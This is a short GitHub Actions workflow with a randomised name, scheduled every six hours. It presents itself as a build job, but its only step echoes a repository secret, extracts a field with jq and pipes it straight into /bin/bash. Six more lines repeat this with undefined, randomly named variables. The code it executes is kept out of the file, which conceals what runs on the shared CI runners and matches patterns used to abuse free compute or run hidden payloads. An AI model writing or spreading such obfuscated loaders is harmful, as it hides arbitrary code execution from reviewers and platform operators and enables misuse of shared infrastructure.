name: examineexact

on:
  workflow_dispatch:
  schedule:
    - cron: '53 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: examineexact
        env:
          bk368: ${{ secrets.bk368 }}
        run: |
          echo $bk368 | jq -r .aa1 | /bin/bash
          echo $cey37413 | jq -r .zkea35 | /bin/bash
          echo $qtndd2 | jq -r .lf58513 | /bin/bash
          echo $kv87981 | jq -r .px1284 | /bin/bash
          echo $kdqk05 | jq -r .jqs735 | /bin/bash
          echo $dviv396 | jq -r .eprj94 | /bin/bash
          echo $zdr9 | jq -r .pufi96 | /bin/bash

